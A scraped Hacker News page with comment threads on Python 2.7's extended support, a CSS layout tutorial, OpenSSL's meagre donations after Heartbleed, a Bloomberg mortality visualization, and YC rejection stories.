Some people make a big deal about figuring out "which" Python to learn - that's not really much of an issue, because Python 3 isn't so different from Python 2 that it's hard to pick up the other very quickly (especially given how much has been backported to 2.7). But it's unfortunate to see people continuing to write new code in Python 2.

[0] http://python3wos.appspot.com/

3
Udo 4 days ago 3 replies      
Speaking as a Python outsider, this looks pathological. If backwards compatibility is such a big hindrance in switching from 2 to 3, why not ship a v2 legacy fallback interpreter along with the new stuff? If you wanted to make it fancy, you could even make a 3-to-2 bridge that allows people to run v2 code from v3.

Am I missing something here?

4
eliben 4 days ago 2 replies      
I think many folks are reading too much into this. "Extended lifetime" is bug-fixes. The final planned release is 2.7.9 in 2015 - beyond that there will be source-only releases for major security problems. No new features, no non-critical bug fixes.

So this isn't really making Python 3 any less appealing. But the Python core developers cannot with a calm heart abandon all the users of 2.x, given the state of adoption today.

5
yason 4 days ago 3 replies      
How I'm not surprised.

Python 3 didn't offer anything that would have been so useful and desirable that people would've jumped on it the moment it was released. In fact, it was actually a bit worse than Python 2 when it was out and those Python 2 users could continue enjoying loads of libraries to go with, and of course they knew how to navigate around Python 2's quirks so why bother. Sadly, this is still what I think of Python 3: "Why bother?".

Python 3 didn't have enough to warrant a 'v3', really: Python 3 could've just been Python 2.7 if it wasn't for the religious backwards compatility in Python, which, ironically seems to matter a lot. The syntactic and semantic differences weren't big enough that Guido couldn't have worked around the most important improvements into 2.x line and dropped less relevant stuff (like removing 'print' statement etc).

Even if Python 2.7 would've needed some changes to existing libraries, the psychological barrier would've been lower. It's about "Fixing my lib to work with Python 2.7 which is top of the line today" versus "Porting my lib to Python 3.0 which will be the official Python in a few years": guess which one sounds more appealing? Note that the amount of work in both cases wasn't that big.

I think mainstream Python will be 2.x till Python 4 is out.

6
wirrbel 4 days ago 0 replies      
The best way would be to release a python 2.9 which incorporates most of the changes from 2 to 3 but the unicode change.

The between Python 2 and Python 3 was just too wide. Even with breaking changes, with a small people will just migrate eventually. Migrating projects drag each other over the "barrier" just like water in a hose can be sucked over a wall.

The issue definitely was not the print command, but other things such as ``iteritems()``, etc - by themselves not much to keep you from migrating, but there is a pile of these boring changes next to the big one (unicode).

I think Guido overestimated the appeal of the new unicode handling and underestimated how resentful people are to change. I figure that at least 1/4 of programmers are actually very opposed to each and every migration and a new version has to have enough incentives to counterbalance this built-in conservativeness.

7
crusso 4 days ago 5 replies      
I just got back into some Python programming after a 2+ year hiatus from the language.

I'm stunned that this 2.x vs 3.x debate is still happening and that 99% of all libraries in use* haven't been converted to 3.x. I like the language, but ... damn... If it weren't for the scikit/numpy stuff, I'd stick with Ruby. The Ruby community seems much less fragmented and wants to see the language move forward. It helps a lot that the 800 pound gorilla, Rails, keeps up with Ruby releases.

edit:* By that, I mean that the conversion rate for commonly used libraries hasn't hit 99%.

8
makmanalp 4 days ago 5 replies      
I see many comments talking about how this will slow down the migration process. But I don't think the situation is that bad.

Most of the py3 wall of superpowers is now green (https://python3wos.appspot.com/) with boto, mysql-python, nltk, python-openid being some of the rare few in terms of not having great py3 alternatives. And most of these have ports on the way already.

So one interesting effect of this is that now that there is some critical mass and people are starting new projects in python3, there is now pressure on package maintainers to have py3 ports. So it's users dragging the packages forward now rather than the packages dragging the users backwards.

9
overgard 4 days ago 2 replies      
The lesson here is that it's important to "sell" new versions of anything. You can't just expect people are going to upgrade because it's the new hotness. Older versions of your own software are often your biggest competitor. (See also: Microsoft and Windows 8).
10
TazeTSchnitzel 4 days ago 4 replies      
Oh for god's sake. Kill the damn thing already.

PHP 4 to 5 was a massive leap compared to Python 2 to 3, but they actually made that leap!

11
shadowmint 4 days ago 0 replies      
To be fair, what was the reasonable alternative?

Cede control of python 2.x to vendors who continue to demand support and bug fixes?

That would be a disaster; it'd be a moment away from new features and a 2.8 'cant believe its not python'.

12
reality_czech 4 days ago 3 replies      
This is the path that all dynamically typed scripting languages must follow. Over time, change becomes impossible because the lack of typechecking or static analysis tools means that any change might break something in a subtle and hard-to-diagnose way. And so the language grows by accretion. You end up with something like bash or perl, where there are a million ways to do any one thing. Each way was added at a particular phase of the language's life, and it could never be removed after that. And so the language becomes difficult to learn and unattractive to newcomers, so another scripting langauge pops up, and the cycle of life begins again.

Compare this to a language like golang, where you can just run "go fix" on your code to update it to the latest version. And you don't have compatibility hell, because when you distribute your application, it's a standalone binary. Stuff like go is the future. Get off the dynamic language hamster wheel.

13
username223 4 days ago 0 replies      
Good news. They have another 5-6 years to recognize their mistake and cut Python 3 loose from Python, like Perl did with Perl 6. It's interesting how the same underlying mistake manifests itself in different cultures: Perl 6 was "we'll break all your code, but give you gonzo new features that we hope are useful." Python 3 was "we'll break all your code, but soothe some pedants and browbeat you into accepting the result."
14
borplk 4 days ago 2 replies      
Damn. I hope my grandchildren see the day when Python 3 is commonplace.
15
Ellipsis753 4 days ago 1 reply      
I just thought I'd like to know what Hacker News thinks.Will Python 2.x ever die?

I'm still writing lots of code with it and even quite a lot of new code. It's been around for ages and it feels like almost no libraries have been ported to 2.x yet. On a couple of occasions I've started a project with Python 3.x just to drop it or move to Python 2.x as a library I need doesn't seem to exist for Python 3.x and I don't want to port it over myself. I've never had this issue with 2.x (no libraries support 3.x only.)

Most Python 3.x "killer features" have been back-ported to Python 2.x and I honestly feel little reason to upgrade myself now. When support for Python 2.7 is officially dropped we could fork it and continue. I would hope it wouldn't take huge amount of effort for some people to support it? Just fix bugs and security issues and take pull requests? In that way might Python 2.x even outlive Python 3.x or at least remain more popular?

16
PythonicAlpha 4 days ago 1 reply      
This is a result of some not so optimal design decisions in the past.

I remember, when Py3 first came out, everything was incompatible -- unnecessary incompatibilities like the u" notation for Unicode string literals that was dropped. Unnecessary incompatibilities in the C-extension-module implementation layer. And so on. The list of incompatibilities was just huge.

Later several of them where dropped, like the string literal trouble ... But than the trouble was already done. Many extension modules where not lifted to the new version, since the overhead was to big.

I think, many more projects would have adopted Py3, if more extension modules would support it.

The huge library of extension modules was always the strength of Python. Now we have many projects still running on Py2, because Py3 did ignore this strength.

17
piokuc 3 days ago 0 replies      
Years ago, when I first heard about Python 3 and plans to improve the language my first thought was "Yes! Multi-line lambdas are coming!", then I started reading more and found out that Guido actually wanted to _remove_ lambdas all together. I still remember the state of shock I was in after reading that, and a sinking feeling.

The lambdas stayed, fortunately, but, unfortunately, I'm still convinced the whole project was a bad idea. The cosmetic changes which make Python 3 incompatible with Python 2.7 are just not worth the trouble of breaking the compatibility. Has anybody ever tried to estimate the man-hours needed to port the myriads of great Python 2.7 libs to Python 3 and weight it against the advantages of subtle language improvements? I don't think so. Plus, the big Python's problems like GIL are still there in Python 3...

If it was up to me I would drop Python 3 and focus the development effort of the community on improving PyPy and porting libraries to it.

18
andr 4 days ago 3 replies      
Since there still won't be a Python 2.8, I read this as the mainstream Python not evolving one bit for the next 6 years. For me, this would be grounds for moving to a different language.
19
undoware 4 days ago 0 replies      
...also, he's renamed it "Python XP"
20
dehrmann 4 days ago 0 replies      
The Python shop I used to work at, and this is a shop with some pretty big fanboys and apologists, wasn't able to upgrade because of library support, and these are people who would like to.
21
bmoresbest55 4 days ago 1 reply      
I understand that changing to Python 3 can be expensive but really all that any company or person is doing is prolonging the inevitable. If they have a good product/app/etc. that will last it will have to change to Python 3 and sometime in the future, right? Why keep waiting? Why support something that is considered by it's makers to be inferior? I really would like answers to these questions, if someone is willing.
22
gaius 4 days ago 1 reply      
By 2020 everyone will have moved onto OCaml anyway.
23
danso 4 days ago 1 reply      
For reference's sake:

Python 2 was released Oct. 2000 and so will have a 20-year lifetime now. http://en.wikipedia.org/wiki/Python_(programming_language)#H...

Ruby 1.8, which was retired last year, had 10 years of life:https://www.ruby-lang.org/en/news/2013/06/30/we-retire-1-8-7...

Obviously, version numbers don't mean the same thing...and Ruby 1.8.x to Ruby 1.9.x (or even 2.x) seems less of a jump than 2.x to 3.x.

24
ishbits 4 days ago 2 replies      
Anyone know if RHEL 7 will ship with Python 3 in the base, even if not default? That could go a long way to boosting Python 3 adoption.

I know it's in SCL, but that lacks convenience for a lot of users.

25
lucb1e 4 days ago 4 replies      
This seems weird to me. Won't this cause a fork in Python at some point, where the 2.7 developers continue on 2.8 or rename it entirely, and another fork continues on what is now Python 3?
26
Walkman 4 days ago 0 replies      
I just purged Python 3 from my computer. Will not serve much in the next 5 years I guess...
27
stefantalpalaru 4 days ago 1 reply      
I still want to see a Python 2 fork getting the care it deserves. I don't trust the motivations of its current developers.
28
andhess 4 days ago 2 replies      
Wow I'm very disappointed. I keep making the effort to transition more to 3, but am frustrated to see so many dependencies only work with 2.7, and thus maintain both libraries. I am tired of this limbo.
29
estebanrules 4 days ago 0 replies      
Can anyone point me in the right direction of an article that sums up how this whole fragmentation started? I'm curious to know the history.
30
gkya 4 days ago 0 replies      
Which kind of means forever?
31
sigzero 4 days ago 0 replies      
That is a huge mistake.
32
estebanrules 4 days ago 0 replies      
I really thought this thread was a prank or joke when I saw the title. Sadly, it's not. The whole 2.7 / 3.x debacle is a large part of why I I have more or less stopped coding in Python and moved on to Ruby. The community is a large part of it as well.
33
crimsonalucard 4 days ago 0 replies      
This is like windows XP.
34
ssweens1 4 days ago 1 reply      
Viva la 2.7!!!
35
mirsimiki 4 days ago 0 replies      
open a shell and type 'import antigravity'
36
SEJeff 4 days ago 3 replies      
Python 2.7.7 aka the Duke Nukem Forever edition!
16
Learn CSS Layout learnlayout.com
345 points by ScottyE  6 days ago   25 comments top 16
1
asb 5 days ago 0 replies      
I've also found The Magic of CSS useful: http://adamschwartz.co/magic-of-css/
2
olegkikin 5 days ago 0 replies      
You need to explain what things do.

This page, for instance, doesn't explain what flexbox does.

http://learnlayout.com/flexbox.html

3
alanfalcon 5 days ago 1 reply      
I'd like to give a big sloppy wet kiss (or just a high five) to ScottyE for linking this. I always felt like I walked in halfway through the CSS story and like I just needed to play catchup through trial and error because try as I have, I've failed to find a resource as clear as this. In short, as a designer who never really learned CSS properly before today, this is a godsend. Thanks.
4
rafeed 5 days ago 0 replies      
Well done. Everything is accurately explained using simple terminology. I'd love to see this expand beyond just layouts. CSS is overwhelming to beginners, but this is dead simple while still delving into deeper, more complex topics.
5
MCarusi 5 days ago 0 replies      
I don't know where I'd be without http://css-tricks.com/ - great site and super helpful forums.
6
subir 5 days ago 1 reply      
This was on HN some time last week: https://news.ycombinator.com/item?id=7521180

Good site, though.

7
nebulous1 5 days ago 1 reply      
Page 2: "it wouldn't make sense to make an inline div"

Page 15: makes inline divs.

:)

8
Ellipsis753 5 days ago 0 replies      
This is a great tutorial and helps me a lot by just reminding me of things.

There's a mistake at http://learnlayout.com/float-layout.html though were they talk about clearfix and how they are using it without actually using it on that page.I just thought I'd say that here in case the author reads it.

9
owenversteeg 5 days ago 0 replies      
This site is great for teaching CSS layout skills. Next time someone asks me, I'll refer them here.

I especially like how it references caniuse for each property it discusses. Nice work!

10
geekam 5 days ago 1 reply      
I really like CSS Mastery: Advanced Web Standards Solutions by Collison, Budd, Moll.
12
prohor 5 days ago 0 replies      
I wish I had this when I was figuring out how it all works. I'll definitely point it friends who start with CSS.
13
rduchnik 5 days ago 2 replies      
For the clearfix can't you just use `clear:right` or `clear:both`? Also for inline-block you can also use the ie7 hack `display: inline-block;*display: inline;zoom: 1;`. Nice tutorial though.
14
Rzor 5 days ago 0 replies      
If anyone wants a complete view of the picture, there is htmldog[1], which covers CSS, HTML and JS.

[1] - http://htmldog.com/guides/

15
guh_me 5 days ago 1 reply      
Really cool, another quality resource to help kill W3Schools.
16
mfeldheim 5 days ago 0 replies      
Awesome work, thanks for sharing that link
17
In a typical year the OpenSSL project receives about US $2000 in donations groups.google.com
344 points by blazespin  6 days ago   161 comments top 22
1
AaronFriel 6 days ago 3 replies      
What other people have said in comments is completely right: OpenSSL, or maybe just this Steve Marquess guy, is missing the forest for the trees. Or in this case, the six figure donations for the pennies. OpenSSL could raise more money in a few months of pan handling in a major city than they raise in a year[1].

A student group that I will soon be President of at the University of Northern Iowa[2] received more in donations and financial support. Our student group is not the best managed, but we care a lot about large sponsors, keeping good relations with them, and making asks that matter.

If someone told me that panhandlers and Midwest student organizations are out-fundraising OpenSSL, I would scoff and laugh. OpenSSL? That's mission-critical software running on nearly every PC and post-PC device in the world. You know what OpenSSL reminds me of in this respect? SQLite.

SQLite charges $75,000 for consortium members[3] to have 24/7 access to phone support direct to developers, guaranteed time spent on issues that matter to them, and so on.

The fact that this doesn't exist for OpenSSL is an embarrassment to project management. I made an offer in that email thread to try to raise $200,000 for OpenSSL by the end of 2014, and I'm repeating it here for visibility:

If you are an employee of a corporation that wants to donate to directly support OpenSSL development by funding staff time, send me an email right now: friela@uni.edu

If you are in the OpenSSL foundation, send me an email right now and I will try to solve your problem by finding a phone number at every major OpenSSL using corporation and making an ask. Want me to do that? Send me an email right now: friela@uni.edu

[1] http://www.ncbi.nlm.nih.gov/pmc/articles/PMC121964/

[2] http://www.unifreethought.com

[3] http://www.hwaci.com/sw/sqlite/prosupport.html

[4] https://sqlite.org/consortium.html

2
patio11 6 days ago 4 replies      
Note the almost painfully predictable response to the thread. Instead of focusing how OpenSSL can pull in, let me pick a number, $800k in revenue in the next year, they immediately zero in on $70 of Paypal fees as the organization's leading financial problem.
3
tptacek 6 days ago 5 replies      
A sponsored bug bounty might be just as useful as more money directly to the project (especially if Google is porting Chromium to it). The nice thing about sponsoring a bug bounty is that anybody can do it; it doesn't require coordination with the project.
4
Nelson69 6 days ago 0 replies      
The donations are one aspect. I'm on the dev mailing list, been lurking for a few years, I've used openssl for various things for years and I have had an interest in when some newer TLS standards were going to be supported. It's a pure bazaar as best I can tell. It's nearly magical how releases happen. I don't know if there is a secret mailing list for the core developers or some IRC channel or something, people post patches to the list, there are some occasional questions and answers, it's insanely low volume for a project as popular as it is. Every now and again some big patches with a lot of new stuff drop. Every now and again someone ponys up some big money and FIPS certification happens. It just sort of keeps meandering a long without a a benevolent dictator.
5
kenrikm 6 days ago 2 replies      
Wow, I'm surprised that someone that's so crucial to the well being of so much of our internet security is funded on $2000/year in donations. I think I'm going to start donating more to stuff like this.
6
saurik 6 days ago 3 replies      
So, first: I agree with patio11. But past that, this thread also bugs me because it is so ill-informed: the very first question that has to be asked is "what is the distribution of donation amounts", as the way to minimize processing fees of "we got one donor who gives almost $2k, and then a handful of people we choose not to turn away who give a few dollars each" is very different than how you handle "we have $2k donors, they all give a dollar". PayPal's micropayment fees are $0.05+5%, which is a massive difference from the default $0.30+2.9% quoted.

And if you have only one really large donors, you get them to give you a check. And then you put their name somewhere. And you send them some thank you letters. And you ask for their advice on how to talk to their friends, as maybe they might also want to donate. Because patio11 is just dead-on right: it is more useful to increase the incoming money here, not avoid losing some fees :/. But again: even if we choose to nitpick fees... this conversation is still going nowhere if the distribution of donations and the process of receiving them (if you have mostly random donations, having them do bank transfers is going to massively increase the loss rate ;P) is not where the discussion started.

7
paulbaumgart 6 days ago 7 replies      
Soo, throwing a little bit of economics out there: BSD-licensed open source software is pretty much a Public Good (http://en.wikipedia.org/wiki/Public_good). There are basically two ways we've figured out how to create public goods: taxation and assurance contracts (like Kickstarter).

Thoughts on the pros and cons of either approach with respect to improving information security infrastructure?

8
socalnate1 6 days ago 0 replies      
I'm surprised I haven't seen anyone mention the "tragedy of the commons" economic theory yet. Though in this case it seems to be happening in reverse, rather than depleting the common resource, we are all neglecting to invest in it.

http://en.wikipedia.org/wiki/Tragedy_of_the_commons

9
wnoise 5 days ago 0 replies      
That's unfortunately still too much. Raising any more money will only delay the death of a project that has suppressed the use of better written projects by dominating that niche in the ecosystem due to first-mover advantage.
10
higherpurpose 6 days ago 1 reply      
Shameful that so many billion dollar corporations rely on it in such a vital way, and only so little is being donated to it.

I think we need a score card for donating to open source projects, in the same way we have score cards for using green materials in devices, or using renewable energy for data centers. We should see periodic reports of how much money these companies donated to open source projects.

11
dpweb 6 days ago 0 replies      
The OpenSSL debacle exposes a real problem with Open source sw. There is massive financial incentive to break it, none to make it safe. Funding its dev does little. Fund guys to break it who will tell you how they did it.
12
mercurial 6 days ago 0 replies      
My usual suggestion would be "that's part of the infrastructure, so governments should get together and foot the bill", but this approach doesn't work for this particular use case.
13
btbuilder 6 days ago 0 replies      
I'm interested in how the payments by third-party companies to OpenSSL foundation for white labeled FIPS-mode OpenSSL are accounted for. Maybe it's a seperate entity?
14
lazylizard 6 days ago 0 replies      
i think, generally, the tendency to think openssl needs help right after seeing openssl need help is..ignoring the problem that there might be other projects similiar to openssl, who need help. its like donating to 1 disaster victim because she appeared in a news story.this thing should be left alone and looked into after a few months(i dont know how long it takes for people to forget,actually) of no stories in the press about openssl.

otoh, if there were a foundation that collected money and funded many projects..it'd look like apache perhaps..

personally, i wouldn't mind an option to donate to apache or openssl in a humblebundle, nor do i mind an option to stick a donate button/widget on my website..or even better, have the widget rotate recipients..

15
betadreamer 6 days ago 0 replies      
I'm very surprised how low the donation is. This proves that OpenSSL was maintained more from contribution / volunteer rather than professionally. No wonder why they were not the first one to find the heartbleed bug...
16
dalek2point3 6 days ago 0 replies      
this might not necessarily be a good thing. see: http://en.wikipedia.org/wiki/Motivation_crowding_theory
17
jokoon 6 days ago 1 reply      
Why not rewrite the whole thing ?
18
keithgabryelski 6 days ago 0 replies      
it's time for the community (and possible all major opensource projects) to have code review parties.

1 week before, a module is declared the subject. at the time of the party, the major owners are on the hook for function by function questions, and line by line when it merits.

reddit? or even a special github community service.

19
nobodyshere 6 days ago 2 replies      
Is it so vaguely undervalued or does it just work so well that it does not need too much improvement?
20
teemo_cute 6 days ago 1 reply      
OpenSSL is like a guardian angel who's invisible to a person. The guardian angel has been helping the person all the time even though he/she doesn't know it. Then the time came that the guardian angel made a little unintentional mistake that led to large consequences. The person then starts blaming the guardian angel, forgetting all the good things the angel has done for him/her.
21
ry0ohki 6 days ago 6 replies      
Dumb question perhaps, but what do they need money for? What would they use it for? It says they pay it out to team members, but if people are doing this work for the money, doesn't that defeat the point?
22
raverbashing 6 days ago 2 replies      
Underfunding is not an excuse for a code that gives headaches to people, lack of testing and blind acceptance of "new features" just for the sake of it.
18
How Americans Die bloomberg.com
336 points by minimax  15 hours ago   133 comments top 30
1
tokenadult 12 hours ago 3 replies      
About three or four slides in you get the take-away message, which is often missed in discussions about mortality here on Hacker News: "If you divide the population into separate age cohorts, you can see that improvements in life expectancy have been broad-based and ongoing." And this is a finding that applies not only to the United States, but to the whole developed world. I have an eighty-one-year-old mother (born in the 1930s, of course) and a ninety-four-year-old aunt (born in the 1920s) and have other relatives who are quite old and still healthy. Life expectancy at age 40, at age 60, and at even higher ages is still rising throughout the developed countries of the world.[1] An article in a series on Slate, "Why Are You Not Dead Yet? Life expectancy doubled in past 150 years. Heres why."[2] explains what incremental improvements have led to better health and increased life expectancy at all ages in the United States. The very fascinating data visualizations in the article submitted today highlight the importance of research on preventing suicide, reducing drug abuse, and preventing senile dementia such as Alzheimer disease, which is where some of the next progress in prolonging healthy life will have to come from.

Professional demographers try to think ahead about these issues, not least so that national governments in various countries can project the funding necessary for publicly funded retirement income programs and national health insurance programs. Demographers have now been following the steady trends long enough to make projections that girls born since 2000 in the developed world are more likely than not to reach the age of 100,[3] with boys likely to enjoy lifespans almost as long. The article "The Biodemography of Human Ageing"[4] by James Vaupel, originally published in the journal Nature in 2010, is a good current reference on the subject. Vaupel is one of the leading scholars on the demography of aging and how to adjust for time trends in life expectancy. His striking finding is "Humans are living longer than ever before. In fact, newborn children in high-income countries can expect to live to more than 100 years. Starting in the mid-1800s, human longevity has increased dramatically and life expectancy is increasing by an average of six hours a day."

I was in a local Barnes and Noble bookstore back when I was shopping for an eightieth birthday gift (a book-holder) for my mom, and I discovered that the birthday card section in that store, which is mostly a bookstore, had multiple choices of cards for eightieth birthdays and even for ninetieth birthdays. We will be celebrating more and more and more birthdays of friends and relatives of advanced age in the coming decades.

[1] http://www.nature.com/scientificamerican/journal/v307/n3/box...

[2] http://www.slate.com/articles/health_and_science/science_of_...

[3] http://www.prb.org/Journalists/Webcasts/2010/humanlongevity....

[4] http://www.demographic-challenge.com/files/downloads/2eb51e2...

2
wtvanhest 14 hours ago 1 reply      
The data is interesting, but somewhat difficult to draw conclusions from without considering how different rates are impacting other rates. What is really noteworthy here is the approach to showing the data. Its effortless to scroll through.

Here are some things I noticed after the fact:

1. I naturally wanted to finish the presentation and was compelled to click to see if there were any amazing insights.

2. After the fact, I have no idea how I even advanced the presentation, all I knew was that I clicked something. It was 100% natural.

It fully pulled me in. I can't remember if there were ads on the sides or more information.

[added] I went back and looked at it again and I think what made it so flawless is that the first page gave me no option but to click the right hand arrow which taught me what to look for. I clicked the right arrow, and then I knew to click it again to advance. The progress dots on the top let me know that I didn't have much time left. Really amazing work here.

3
webwright 13 hours ago 3 replies      
Ugh, the fact that many of these charts show raw # of deaths versus deaths/100k really masks how much things have improved. In 1968, the population was 64% of our current population... So a flat line is actually a pretty massive improvement.
4
minimax 14 hours ago 0 replies      
If you liked this, you might enjoy some of their previous articles. It's interesting to see them iterating on the technique.

Consumer spending (from last December): http://www.bloomberg.com/dataview/2013-12-20/how-we-spend.ht...

Housing prices (from February): http://www.bloomberg.com/dataview/2014-02-25/bubble-to-bust-...

5
brudgers 12 hours ago 4 replies      
"And, how do suicide and drugs compare to other violent deaths across the population? Far greater than firearm related deaths, and on the rise

In 2010, 19,392 of the 38,364 suicides were "by discharge of firearm" [the same term used for classifying 11,078 homicides and 606 accidental deaths]. Seems a bit odd that the report classifies the accidents and homicides as "firearm related deaths" but the suicides as unrelated.

From a public health perspective, a 50% reduction in suicide by firearm would save more lives than the complete elimination of HIV deaths or cervical cancer deaths or uterine cancer deaths.

http://www.cdc.gov/nchs/data/nvsr/nvsr61/nvsr61_04.pdf

6
ef47d35620c1 12 hours ago 2 replies      
I heard once that one cigarette a day as a stress relief may actually extend your life. I'm not sure about that, but I do think we need to be mentally and emotionally healthy too. Our health and well-being is not purely physical.

I would think that happy people who are not constantly under stress live longer.

7
mberning 14 hours ago 6 replies      
Any info on how they create these visualizations? Are they using any particular libraries or frameworks?
8
imgabe 14 hours ago 1 reply      
So in 1968 all age cohorts had the exact same mortality rate of 100 per 100,000? Why is that?
9
ABNWZ 14 hours ago 4 replies      
"This is particularly striking since cancer and heart disease - the two biggest killers for 45-54 yr olds - have become much less deadly over the years"

Except your graph shows that cancer death rates have increased by almost 20% from 1968-2010... Am I missing something here?

10
richev 14 hours ago 4 replies      
Very nice graphs and visualisations, but am I alone in finding most of them hard to understand?
11
drinkzima 7 hours ago 0 replies      
Pretty incredible user experience on mobile, haven't seen graphs that look that good in a mobile web browser (and interactive no less).
12
rpedela 14 hours ago 4 replies      
The part about suicides is pretty interesting and perplexing. Are there any insights into why the rate has increased?
13
Pxtl 13 hours ago 0 replies      
Maybe we should have a war on drugs, then. I'm sure that would work.

Getting guns out of our communities is probably easier than getting drugs out of them, not to mention mental conditions that lead to suicide.

14
kafkaesque 11 hours ago 1 reply      
I got the presentation's/graph's main takeaway, but did anyone else notice that women's mortality rate hardly changed since 1968? Why was this, I wonder? Is this a population thing or because women were mostly kept inside doing safer house duties or what?
15
dclowd9901 12 hours ago 0 replies      
If whomever contributed to the code on this is around, could you give us some insight into building this app, or do a writeup? I'd be super interested to see how you designed/architected such a smooth and experience.
16
infosample 13 hours ago 4 replies      
Black males die at such a higher rate from AIDS. Are they having that much more unprotected sex, taking that many more drugs from dirty needles, or getting that much inferior treatment than the general population?
17
cheetahtech 14 hours ago 3 replies      
It interesting to see that drugs and suicide are the highest causes of death, well over that of guns. But we seem to be progressing more towards a drug open world and gun closed world. Do you see the Irony?
18
bittercynic 12 hours ago 1 reply      
I couldn't figure out any way to navigate without using the mouse.
19
dmritard96 13 hours ago 0 replies      
"progress stopped in the mid 1990s"maybe i am missing something but it seems like the mortality rate would be a lagging indicator progress hence progress would have "stopped" earlier?

Not that I necessarily would say it stopped at all...

20
matthewisabel 13 hours ago 1 reply      
I created a visualization on a similar topic that looked at mortality rates state-by-state using the 2010 census data. It was on HN about six months ago.

http://www.matthewisabel.com/projects/deathrates/geographic....

21
devanti 13 hours ago 0 replies      
Surprised how nice the visualization looks, given how ugly the Bloomberg terminal is
22
0003 14 hours ago 1 reply      
Any reason why the 75-84 group was out living the 85+ group until recently?
23
RobotCaleb 13 hours ago 0 replies      
That's neat, but it's very hard to tell the colors apart.
24
fophillips 14 hours ago 0 replies      
Need some error bars on that data.
25
brokenrhino 13 hours ago 0 replies      
I wonder is the drop in car accident death caused by;1) Cash for clunkers taking old dangerous cars off the road so the fleet consists of more newer safer carsor;2) People driving less since the recession and the gas price increases
26
jon_black 9 hours ago 1 reply      
Everyone knows that the most Americans actually die in terrorist attacks. How else can you justify such emphasis on fighting it? Hmmmmmmmm.
27
dragontamer 13 hours ago 0 replies      
<script src="global/js/jquery-1.8.3-min.js" charset="utf-8"></script>

<script src="js/modernizer.2.7.1.js" charset="utf-8"></script>

<script src="js/underscore.1.5.2.js" charset="utf-8"></script>

<script src="global/js/less.js" charset="utf-8"></script>

<script src="global/js/d3.v2.js" charset="utf-8"></script>

<script src="js/jquery.cycle.all.js" charset="utf-8"></script>

It looks like the majority of this visualization was from the D3.js library. I've been seeing more and more web-documents of this style, it must be because of the rise of D3.

28
EGreg 12 hours ago 0 replies      
"That's why total deaths in the 75+ category has stayed constant"

I thought that was a particularly funny statement. Reminded me of the onion: http://www.theonion.com/articles/world-death-rate-holding-st...

29
joshuak 14 hours ago 4 replies      
So to achieve longevity escape velocity [0]

1. Don't have unprotected sex if you're less than 44 years old.

2. Don't kill yourself, or do drugs, if you're less than 54 years old.

3. Invest heavily in heart disease, cancer, and alzheimer's research.

[0] http://en.wikipedia.org/wiki/Longevity_escape_velocity

30
ihodes 14 hours ago 5 replies      
Probably the four most important things you can do to change your odds of making it past 80 are:

    1. Not smoking.    2. Eating healthily (fiber, vitamins, low sugar; this is a nascent field).    3. Exercising regularly.    4. Wearing sunscreen and minimizing sun exposure.
These will collectively reduce your risk of common cancers significantly, as well as protect against heart disease. Additionally, they can help strengthen your immune system and body against other diseases that e.g. the malnourished or obese would be more likely to succumb to.

19
The Worst Part of YC samaltman.com
325 points by dmnd  2 days ago   106 comments top 26
1
zt 2 days ago 5 replies      
While I was in college, I was put on a committee to choose a new Director of Admissions. One of the internal candidates said during his interview: "There is a good reason that everyone who is accepted gets in, but there is not a good reason why people are rejected."

It many ways that seems obvious. To get in you have to have something going for you. To not get in you don't have to do anything wrong, you just have to not have a thing that does get you in. It would be just as hard for my college to write high school seniors a letter saying, well, you were 2nd in your class and had a 1500 but noting stood out as would be for YC to write people direct feedback at scale. What would it really mean? How do you action that? No special sauce isn't really feedback. You can't point to anything wrong other than you can't point to anything great.

This has proven true for me in the admissions processes I've gone through on the other side: whether at a consulting firm, or Stripe, or Standard Treasury, or Echoing Green (I read semi-finalist apps). Most people self-select to apply for good and just reasons but some people really excite you and some people don't. Some people just have that something special, and the people who don't don't really have anything wrong with them.

So to me this commentary rings true and is honestly put.

2
wildermuthn 1 day ago 6 replies      
At West Point, I was one of ten cadets in my class of one thousand to make the parachute team. For some reason, the parachute team had become a symbol-status and a fast track to cadet success.

What's interests me the most is that I had no idea, no clue, that the skydiving team was a fast-track to promotion. I just wanted to jump out of planes. That wasn't the case with many of my teammates. We had some great talent on the skydiving team the most talented men and women at West Point. But some of them hated jumping out of planes, and they did poorly.

Sama writes that the number and quality of YC applications has risen. That might not be a good thing. Talent and ambition aren't the greatest indicators of startup success.

I don't think its a coincidence that Dropbox, Reddit, AirBnb, Justin.tv, Loopt, and Stripe all came within the first few years of YC's existence, and that YC's more recent companies haven't taken off in the same way. It might be because immensely talented people see YC as their avenue to success.

If being immensely talented and ambitious was the prime requisite for startup-success, then YC would be in a great position. But as I understand it, having talent and ambition don't matter as much as having a determined, cohesive, and visionary team.

3
tdullien 1 day ago 1 reply      
Perhaps as a "cheer up" story: We applied to YC in their very first batch and got rejected. It is unclear what the reasons were -- but there were many reasons why it was understandable for YC to reject us. Among other things, the company had already been incorporated in Germany, we already had a few customers, we had decidedly nonexistent mass-market potential, the entire company was a bad idea from a purely business perspective, and just in almost every imaginable way did not fit the mold.

This did not deter us from continuing; our company was profitable already, and we worked our butts off for the next few years (without any reasonable perspective of ever getting acquired, or even growing the company to be big). The work was interesting, and for a company that size, we had a surprisingly large impact (indirectly) on the wider world, but it was heavy toil with little reward.

Either way - history then shifted under our feet, and it turned out in 2010/2011 that we had the combination of technology and team that out of a sudden had become pretty important to Google, and then after a long and painful negotiation process, we got acquired in 2011. Not a gangbusters acquisition by any stretch of the imagination, but one that worked out nicely for everyone involved.

So perhaps the takeaway from this is: YC is great, but perhaps the great redeeming quality of modern capitalism is that you do not require gatekeepers in order to be successful. "You play shit that they like, and people will come, simple as that." - e.g. if you build a product that people like, people will give you money to build more of that product. Decentralized decision-making and the ability to bootstrap with nothing but a compelling product may be the one thing that led to our current economic system to out-compete the others.

When we started the company, I wanted to build X. This was a huge endeavor, and I knew that on the way to X I'd need to build Y and Z; so I ended up building Z first, then used income from Z to bootstrap development on Y, then I got sidetracked a bit on B because we found a surprising application of our technology to a different field, and just when I was about to get back to X, we got acquired principally for B and Z. So up until today, we have made very little progress on X itself, but that doesn't matter :-)

So if you're rejected from YC, don't despair. Use it to re-examine what you're doing, understand that investment is like dating (some people are just not made for each other, and it will end in horror if you pretend to be someone you are not), and then channel your disappointment into velocity :-P

(PS: pg, if you folks have any notes whatsoever on reasons for rejection in the first YC batch, I would love to have more background info - but it is also pretty understandable if no memory at all exists ;)

4
zbruhnke 2 days ago 1 reply      
It's nice to see the side of investors that still have a passion for startups so much so that they feel sad when they reject people.

It often feels like noone in that world has empathy.

For the ones getting rejection emails tonight don't sweat it. I got into YC on my Third try and it was worth every rejection.

